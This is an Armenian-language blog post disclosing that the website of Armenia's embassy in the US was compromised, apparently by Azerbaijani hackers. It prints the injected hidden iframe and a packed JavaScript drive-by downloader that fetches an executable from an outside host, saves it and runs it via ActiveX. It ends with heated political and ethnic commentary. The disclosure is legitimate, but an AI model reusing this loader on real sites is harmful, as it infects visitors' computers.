Entry tags:

անվտանգության խնդիրներ, համացանց, հայաստանի առեւտրական հանրապետություն

ԱՄՆ-ում Հայաստանի դեսպանատան կայքը՝ ադրբեջանական ցանցահենների հերթական զոհ
Այս գիշեր տեղեկատվություն ստացա ընկերոջիցս՝ Ներսես Զուրաբյանից, որ կարծես թե ԱՄՆ-ում հայկական դեսպանատան կայքէջերից մեկը վիրուս է պարունակում։ Այդ մասին իրեն զգուշացրել էր շատերիս ծանոթ Սահակը (ազգանունը կգրեմ, եթե ինքը հայտնի ինձ, որ դեմ չէ)։

Ներսեսի հետ համատեղ ստուգումից հետո պարզվեց, որ.

1. Ադրբեջանցի ցանցահենները (hackers) կոտրել են դեսպանատան կայքը ստեղծած ընկերության կայքը, ու փոխարինել այդ կայքի գլխավոր էջը։

2. Հավանաբար, օգտագործելով այդ ընկերության կայքը կոտրելիս ստացված տվյալները, մուտք են գործել նաև դեսպանատան կայք ու որոշ էջերում գաղտնի կերպով այնպիսի ծրագրային կոդ են տեղադրել, որ կարող է վիրուսով վարակել այդ էջերը ընթերցողների համակարգիչները։ Այդ էջերից առնվազն մեկում վնասակար կոդը գործում է առ այսօր։

Ապշեցուցիչ է, բայց փաստ է. համաձայն Գուգլի տվյալների, արդեն 3 ԱՄԻՍ է այս վիճակն է։



Զգուշացում. եթե 100%-ով համոզված չեք ձեր համակարգիչների պաշտպանվածության մեջ, ապա մի այցելեք ստորև բերվող վարակված էջերը, քանի որ ձեր համակարգիչը նույնպես կարող է վարակվել։

1. Դեսպանատան կայքի բոլոր էջերի ներքևում նշված է Stratomedia, Inc ընկերությունը, որն, ըստ գրվածի՝ պետք է ապահովի դեսպանատան կայքի անխափան աշխատանքը։



2. Այցելելով Stratomedia, Inc ընկերության կայքի գլխավոր էջը, կտեսնենք, որ այն ակնհայտորեն զոհ է դարձել «Hack-Labs Rush Team» անունով ցանցահենների խմբի։



3. Ինչքա՞ն ժամանակ է վարակված դեսպանատան կայքը։ Փորձենք պատասխանը ստանալ Google-ից։ Գուգլում որոնում տալով հետևյալ հրամանով "site:www.armeniaemb.org consular armenian embassy washington" գտնում ենք պոտենցիալ վարակված էջերը.



Ուշադրություն դարձրեք այն պարբերություններին, ուր հղումով վերնագրի տակ գրված է. «This site may harm your computer.» Գուգլը զգուշացնում է, որ այս էջերում հնարավոր վտանգ կա։ Ի՞նչ վտանգ է, և երբ է այն հայտնաբերվել Գուգլի կողմից։ Այս իմանալու համար անհրաժեշտ է կարդալ դեսպանատան այդ կայքէջին վերաբերվող Գուգլի ախտորոշիչ էջը.

Ի՞նչ ենք տեսնում.

What is the current listing status for www.armeniaemb.org/ConsularAffairs/?
Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?
Google has not visited this site within the past 90 days. Suspicious activity was detected over 90 days ago, but no data is available for the past 90 days.

Հարց է ծագում. գուցե՞ Գուգլի կողմից 90 օր առաջ հայտնաբերված վիրուսը արդեն վերացվել է դեսպանատան կայքի բոլոր էջերից։ Պատասխանը բացասական է։

4. armeniaemb.org/ConsularAffairs/Index.htm էջում (զգուշացում՝ այս էջը բացելը վտանգավոր է) մինչև այժմ էլ վնասակար կոդ է պարունակվում, մասնավորապես հետևյալ տողը՝

<IFRAME border=0 name=AMEMBMFANetwork src="http://www.daymoihk.info/ascript.php?s=sc&n=armenianemb.org"
frameBorder=0 width=1 height=1></IFRAME>

Այս կոդի միջոցով ինչ-որ daymoihk.info կայքից ծրագիր է աշխատացվում։ Ի՞նչ ծրագիր է։ Ի՞նչ կայք է։

Կայքը, ինչպես կարող եք ինքներդ տեսնել, կարծես թե պատկանում է ադրբեջանական «Կասպիյ» թերթին։ Իսկ վնասակար ծրագրի կոդը կարող եք տեսնել այս հասցեով (քանի դեռ չեն ջնջել). daymoihk.info/ascript.php?s=sc&n=armenianemb.org

Ծրագրի պարունակությունը հետևյալն է.

<script type='text/javascript'>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('l 9(o,n){3 r=c;5{7(\'r = o.m(n)\')}6(e){}4(!r){5{7(\'r = o.m(n, "")\')}6(e){}}4(!r){5{7(\'r = o.m(n, "", "")\')}6(e){}}4(!r){5{7(\'r = o.h("", n)\')}6(e){}}4(!r){5{7(\'r = o.h(n, "")\')}6(e){}}4(!r){5{7(\'r = o.h(n)\')}6(e){}}j(r)}l 1I(o,n){3 r=c;j(r)}l w(a){3 G=\'1d\';3 D=\'I\';3 F=\'K.X\'+D+G;3 g=9(a,F);3 26=\'f\';3 25=\'f\';3 24=\'f\';3 16=\'f\';g.E(\'21\',\'20://14.M.1X/1W.1V\',1U);g.1T();3 u=\'1S.10\';3 8=9(a,u);8.1P=1;8.E();8.1N(g.1L);3 k=\'.//.\'+\'.//1K\'+\'T.e\'+\'U\';8.1G(k,2);3 s=9(a,\'p.H\');s.1D(k);j 1i}3 i=0;3 t=v 1z(\'{z-A-q-B-1y}\',\'{z-A-q-B-1o}\',\'{1p-1s-1t-1v-1w}\',\'{1A-d-d-C-x}\',\'{1B-d-d-C-x}\',\'{1J-1O-1Q-1Y-1Z}\',\'{27-28-1b-O-19}\',\'{18-17-L-15-N}\',\'{13-12-11-Q-Z}\',\'{Y-W-V-1e-1f}\',\'{1h-1j-1l-1m-1n}\',\'{1q-1u-1x-1C-1E}\',\'{1M-1R-22-29-1a}\',c);J(t[i]){3 a=c;4(t[i].y(0,1)==\'{\'){a=P.R(\'S\');a.1c(\'1F\',\'1k:\'+t[i].y(1,t[i].1r-1))}1H{5{a=v 23(t[i])}6(e){}}4(a){5{3 b=9(a,\'p.H\');4(b){4(w(a))1g}}6(e){}}i++}',62,134,'|||var|if|try|catch|eval|obj_adodb|CreateO|||null|0000||a1q1|obj_msxml2|GetObject||return|fn|function|CreateObject|||Shell|11D0||||stre|new|Go|000000000046|substring|BD96C556|65A3|983A|C000|ms2|open|msx|ms1|Application|MLH|while|msxml2|4331|daymoihk|339E03C0AE3D|A0D8|document|8358|createElement|object|viewer|xe|4831|1B2D||639F725F|09FCD1DB0766|stream|43c8|F4C2|06723E09|www|8A26|aq4|F06F|7F5B7F63|FCFDF33E833C|6C07C962476B|451D|setAttribute|TTP|A9FD|874847682010|break|BA018599|TRUE|1DB3|clsid|44f9|83B4|461454C84BF8|00C04FC29E36|AB9BCEDD|D0C07D56|length|EC7E|47E1|7C69|9322|D4A210617116|43F1|00C04FC29E30|Array|0006F033|0006F03A|B4A0|ShellExecute|25F5A11FAB19|classid|SaveToFile|else|CreateAA|6e32070a|image|responseBody|E8CCCDDF|Write|766d|type|4ee6|CA28|adodb|send|false|php|amuse|info|879c|dc1fa91d2fc3|http|GET|496b|ActiveXObject|aq3|aq2|aq1|6414512B|B978|B050'.split('|')))
</script>

Հուսով եմ, այս գրառումը ընթերցող ծրագրավորողները կարող են գլուխ հանել, թե ինչ է այն անում, բայց կասկած չկա, որ սա օրինական ծրագիր չէ։

Հարց է ծագում. քանի՞ անգամ պետք է Ադրբեջանի թուրքերը կոտրեն հայկական կայքերը, ներթափանցեն պետական կառույցների տեղեկատվական համակարգերի մեջ, որ մեր չինովնիկությունը հասկանա, որ համակարգչային անվտանգության խնդիրներով իսկապես պետք է լուրջ զբաղվել։ Գլխումս ուղղակի չի տեղավորվում, թե ինչպե՞ս կարելի 3 ամիս չնկատել, որ կայքդ կոտրել են, եթե նույնիսկ Գուգլը բացեիբաց այդ մասին զգուշացնում է։ 3 ամիս, գրողը տանի!!! Արդյո՞ք դեսպանատան աշխատակիցները ոչ մի անգամ չեն այցելել իրենց կայքը, արդյո՞ք ոչ մեկը թարմ անտիվիրուս չուներ, որ զգուշացներ, որ այս կայքէջում վնասակար կոդ է պարունակվում։ Արդյո՞ք Գուգլի միջոցով չեն ստուգել, թե ինչպես է գտնվում իրենց կայքը։ Չեմ հասկանում, մի գուցե թուրքական տանկերը պետք է գան կանգնեն Հանրապետության հրապարակում, որ համապատասխան մարմինները վերջապես նկատեն, թե մի բան «էն չի»։